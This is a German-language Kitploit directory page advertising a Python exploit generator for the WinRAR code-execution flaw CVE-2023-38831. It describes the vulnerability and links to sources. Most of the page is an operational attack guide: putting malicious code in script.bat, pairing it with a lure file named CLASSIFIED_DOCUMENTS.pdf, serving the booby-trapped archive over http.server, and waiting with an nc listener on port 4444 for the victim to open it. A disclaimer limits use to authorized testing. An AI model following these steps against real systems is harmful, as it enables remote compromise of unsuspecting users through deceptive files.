Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38831 — Python-basierter Exploit-Generator für die WinRAR-Codeausführungssicherheitslücke CVE-2023-38831. Erstellt schädliche ZIP-Archive, die harmlose Dateien mit ausführbaren Payloads kombinieren, für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/asepsaepdin/cve-2023-38831
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubasepsaepdin/cve-2023-38831

CVE-2023-38831

Python-basierter Exploit-Generator für die WinRAR-Codeausführungssicherheitslücke CVE-2023-38831. Erstellt schädliche ZIP-Archive, die harmlose Dateien mit ausführbaren Payloads kombinieren, für autorisierte Sicherheitstests.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38831 - RARLAB WinRAR Code-Ausführungs-Schwachstelle

Python


⚠️ Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke

Ursprüngliche Exploit-Autoren

Vielen Dank an den ursprünglichen PoC-Autor b1tg und Group-IB Threat Intelligence

Beschreibung

RARLabs WinRAR vor Version 6.23 erlaubt Angreifern, beliebigen Code auszuführen, wenn ein Benutzer versucht, eine harmlose Datei in einem ZIP-Archiv anzuzeigen.

Bild

Das Problem tritt auf, weil ein ZIP-Archiv eine harmlose Datei (z. B. eine gewöhnliche .JPG-Datei) und auch einen Ordner mit demselben Namen wie die harmlose Datei enthalten kann. Die Inhalte des Ordners (die ausführbare Inhalte enthalten können) werden verarbeitet, wenn versucht wird, nur auf die harmlose Datei zuzugreifen. Dies wurde zwischen April und August 2023 in freier Wildbahn ausgenutzt.

Demo

winrar


Schritt-für-Schritt-Anleitung

  1. Ändern Sie zunächst die Datei script.bat mit Ihrem gefährlichen Ausführungscode.

  2. Fügen Sie die Köderdatei ein, empfohlen wird ein Bild (.png, .jpg) oder ein Dokument (.pdf).

  3. Führen Sie den Befehl aus, um die Exploit-Datei zu generieren:

    root@kitploit:~
    python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar
    
  4. Senden Sie die Exploit-Datei an das Zielgerät mit python http.server, zum Beispiel:

    root@kitploit:~
    python -m http.server
    
  5. Richten Sie den Listener auf Ihrem Angreifer-Rechner ein:

    root@kitploit:~
    nc -nlvp 4444
    
  6. Laden Sie die Exploit-Datei herunter und öffnen Sie sie mit WinRAR vor Version 6.23.


Quellen

  • https://github.com/b1tg/CVE-2023-38831-winrar-exploit
  • https://nvd.nist.gov/vuln/detail/CVE-2023-38831
  • https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
Tool herunterladen